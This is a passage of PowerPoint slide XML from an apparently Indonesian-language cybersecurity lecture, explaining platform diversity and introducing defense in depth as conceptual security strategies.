            <a:endParaRPr lang="en-ID" dirty="0"/>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162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174771037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Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mendalam</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menavigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbiasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mendalam</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menekankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlapis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
